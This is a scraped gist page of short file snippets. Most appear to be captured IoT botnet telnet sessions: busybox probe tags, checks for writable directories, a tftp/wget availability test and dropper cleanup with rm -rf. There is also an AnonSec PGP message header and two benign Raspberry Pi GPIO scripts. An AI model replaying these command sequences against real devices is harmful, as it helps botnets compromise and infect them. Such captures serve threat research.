This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
enable | |
system | |
shell | |
sh | |
>/tmp/.ptmx && cd /tmp/ | |
>/var/.ptmx && cd /var/ | |
>/dev/.ptmx && cd /dev/ | |
>/mnt/.ptmx && cd /mnt/ | |
>/var/run/.ptmx && cd /var/run/ | |
>/var/tmp/.ptmx && cd /var/tmp/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-----BEGIN PGP SIGNED MESSAGE----- | |
Hash: SHA1 | |
Version: OpNasaDrones | |
pub 4096R/4AAE63E0 2015-10-01 | |
Key fingerprint = DEFD 83DD 81B5 A61D 9959 C009 4CFF 6773 4AAE 63E0 | |
uid AnonSec (Nihil Verum Est Omnia Licita) <[email protected]> | |
.8. b. 8 ,o888888o. b. 8 d888888o. 8 8888888888 ,o888888o. | |
.888. 888o. 8 . 8888 `88. 888o. 8 .`8888:' `88. 8 8888 8888 `88. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
enable | |
shell | |
sh | |
linuxshell | |
bah | |
hostname Ex0_1761 | |
/bin/busybox Ex0 | |
/bin/busybox ps; /bin/busybox Ex0 | |
/bin/busybox cat /proc/mounts; /bin/busybox Ex0 | |
/bin/busybox echo -e '\x45\x78\x30\x31/proc' > /proc/.nipped; /bin/busybox cat /proc/.nipped; /bin/busybox rm /proc/.nipped |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
enable | |
system | |
shell | |
sh | |
cat /proc/mounts; /bin/busybox RFIZK | |
cd /tmp; cat .s || cp /bin/echo .s; /bin/busybox RFIZK | |
tftp; wget; /bin/busybox RFIZK | |
dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s | |
/bin/busybox RFIZK | |
>.s; cp .s .i |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
enable | |
shell | |
sh | |
/bin/busybox LOLKEK | |
/bin/busybox ps; /bin/busybox LOLKEK | |
/bin/busybox cat /proc/mounts; /bin/busybox LOLKEK | |
/bin/busybox echo -e '\x66\x75\x63\x6b/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon | |
/bin/busybox echo -e '\x66\x75\x63\x6b/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon | |
/bin/busybox echo -e '\x66\x75\x63\x6b/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon | |
/bin/busybox echo -e '\x66\x75\x63\x6b/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
enable | |
shell | |
sh | |
linuxshell | |
bah | |
hostname Ex0_3860 | |
/bin/busybox Ex0 | |
/bin/busybox ps; /bin/busybox Ex0 | |
/bin/busybox cat /proc/mounts; /bin/busybox Ex0 | |
/bin/busybox echo -e '\x45\x78\x30\x31/proc' > /proc/.nipped; /bin/busybox cat /proc/.nipped; /bin/busybox rm /proc/.nipped |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
enable | |
system | |
shell | |
sh | |
ping ; sh | |
linuxshell; /bin/busybox LMAO | |
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox LMAO | |
/bin/busybox LMAO | |
>/tmp/.file && cd /tmp/ | |
/bin/busybox rm -rf .file .z.binary .z.dropper |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
enable | |
system | |
shell | |
sh | |
linuxshell | |
>/tmp/.ptmx && cd /tmp/ | |
>/var/.ptmx && cd /var/ | |
>/dev/.ptmx && cd /dev/ | |
>/mnt/.ptmx && cd /mnt/ | |
>/var/run/.ptmx && cd /var/run/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Random LED blinking for Cytron Maker pHAT | |
#https://github.com/odolezal | |
#=========================== | |
from gpiozero import LED, Button, Buzzer | |
import random | |
from time import sleep | |
from threading import Thread | |
LED1 = LED(17) | |
LED2 = LED(18) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Control Raspberry Pi GPIO via http web server | |
#Original code from: https://github.com/e-tinkers/simple_httpserver | |
#================================================================== | |
#Code designed for Cytron Maker pHAT | |
#=================================== | |
#Added: | |
#support control for all 8 LEDs ("/ledX/" URL endpoints) | |
#support control for buzzer | |
#some minnor HTML code changes | |
#============================= |
OlderNewer